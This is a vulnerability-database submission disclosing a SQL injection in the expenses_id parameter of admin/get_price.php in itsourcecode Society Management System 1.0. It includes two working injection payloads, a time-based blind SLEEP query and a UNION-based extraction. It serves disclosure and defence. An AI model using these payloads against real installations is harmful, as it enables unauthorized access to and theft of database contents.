| Title | itsourcecode society Management System v1.0 SQLi get_price.php |
|---|
| Description | In the admin/get_price.php page, there is a SQL injection vulnerability. An attacker can inject SQL statements through the expenses_id parameter.
---
Parameter: expenses_id (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: expenses_id=1' AND (SELECT 2866 FROM (SELECT(SLEEP(5)))fobU) AND 'jWHt'='jWHt
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: expenses_id=1' UNION ALL SELECT NULL,CONCAT(0x717a716a71,0x546849444147574a76497952446555796b4952674c65737452485a514b55576d646a48435665566d,0x71786a7871),NULL,NULL,NULL,NULL-- -
---
Download Source Code: https://itsourcecode.com/wp-content/uploads/2021/04/Society-Management-System-Project-In-PHP-Free-Download-Source-Code.zip
|
|---|
| Source | ⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE7-4.md |
|---|
| User | Dee.Mirage (UID 71702) |
|---|
| Submission | 07/26/2024 03:09 (2 years ago) |
|---|
| Moderation | 07/28/2024 09:18 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 272611 [itsourcecode Society Management System 1.0 /admin/get_price.php expenses_id sql injection] |
|---|
| Points | 20 |
|---|